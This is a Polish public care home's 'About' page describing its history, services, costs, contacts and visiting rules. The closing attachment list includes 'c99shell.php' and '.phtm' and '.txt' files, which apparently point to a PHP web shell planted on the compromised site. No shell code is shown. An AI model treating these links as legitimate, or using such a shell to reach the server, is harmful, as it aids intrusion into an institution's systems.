DPS Kąty - tlo
Widok standardowy Widok dla słabowidzących Czcionka standardowa Czcionka średnia Czcionka duża Drukuj

O Domu

Witamy na stronie DPS Kąty

 

 „Oczy człowieka pokazują głębię jego serca,

bez  względu w jakiej twarzy są osadzone.

Bez  względu na to, jakie ręce się do ciebie wyciągają.

W tych oczach jest zawsze wypisana miłość,

albo pragnienie miłości.”

                                                           Ks. Bp Marek Solarczyk

 
Dom Pomocy Społecznej w Kątach powstał w 1975 roku jako placówka przeznaczona dla dzieci i młodzieży niepełnosprawnych intelektualnie.
W 2012 roku rozszerzono typ Domu i mogą w nim zamieszkiwać również dorosłe osoby niepełnosprawne.
Placówka mieści się w zabytkowym, dziewiętnastowiecznym dworku położonym w samym centrum malowniczego parku krajobrazowego wpisanego do rejestru zabytków województwa mazowieckiego. Lokalizacja Domu Pomocy Społecznej stwarza optymalne warunki życia i terapii mieszkańców pod względem przyrodniczym i klimatycznym. Już od ponad trzydziestu lat ośrodek stanowi "drugi dom" dla osób niepełnosprawnych intelektualnie.
Celem Domu jest zapewnienie mieszkańcom całodobowej opieki poprzez świadczenie usług opiekuńczych, bytowych, wspomagających   
i edukacyjnych.
Usługi opiekuńcze świadczone przez Dom obejmują: pomoc w podstawowych czynnościach życia codziennego, pielęgnację, w tym pielęgnację w czasie choroby, opiekę higieniczną, niezbędną pomoc w załatwianiu spraw osobistych, kontakty z otoczeniem, edukację, rehabilitację, organizację czasu wolnego, rozrywkę i pomoc w korzystaniu ze świadczeń zdrowotnych.
W  dniu 10 czerwca 2008 roku oddano do użytku nową mieszkalną części Domu. Powstał nowoczesny kompleks przeznaczony
dla 50 mieszkańców, przystosowany do całodobowej opieki, rehabilitacji, edukacji i wypoczynku.

W dniu 22.12.2008 roku Dom Pomocy Społecznej w Kątach został wpisany na czas nieokreślony do Rejestru domów pomocy społecznej województwa mazowieckiego pod pozycją nr 58.

Koszt utrzymania mieszkańca w 2022 roku, ustalony na podstawie Zarządzenia Nr 17/22 Starosty Mińskiego z dnia 15 marca 2022 roku wynosi: 5.493,20 zł. Zarządzenie zostało opublikowane w Dzienniku Urzędowym Województwa Mazowieckiego pod pozycją 3211.   

Dom Pomocy Społecznej w Kątach
Kąty 22, 05-332 Siennica,
telefon: 25 799 19 07
jest prowadzony przez Powiat Miński z siedzibą w Mińsku Mazowieckim przy ul. Kościuszki 3
05-300 Mińsk Mazowiecki
telefon: centrala 25 759 87 00

Dyrektor Domu Pomocy Społecznej w Kątach - pani Danuta Ekert przyjmuje interesantów w poniedziałki i czwartki w godzinach: 9.00 -11.00.
Kontakt telefoniczny z Dyrektorem: 25 757 26 71.

 


WAŻNE INFORMACJE DLA ODWIEDZAJĄCYCH  01.07.2021

Uprzejmie informujemy, że od dnia 01.07.2021 r., zostaje zniesiony zakaz odwiedzin i wstępu do budynków DPS w Kątach. Dla zachowania bezpieczeństwa Mieszkańców, każdorazowo należy ustalić telefonicznie z Kierownictwem Placówki zasady na jakich wejście może zostać zrealizowane. Nadal obowiązuje zachowanie reżimu sanitarnego: przed wejściem pomiar temperatury, dezynfekcja dłoni oraz zasłanianie ust i nosa.  Telefon kontaktowy: 25 799 19 07

 

 


zalacznik-ss ss.jpg

zalacznik-ss ss.jpg

zalacznik-aa aa.phtm

zalacznik-iq iq.txt

zalacznik-c99shell c99shell.php
Dofinansowanie z projektu UE - Wsparcie dla Mazowsza
Created by ARISCO
Copyright © 2021 DPS Kąty. Wszelkie prawa zastrzeżone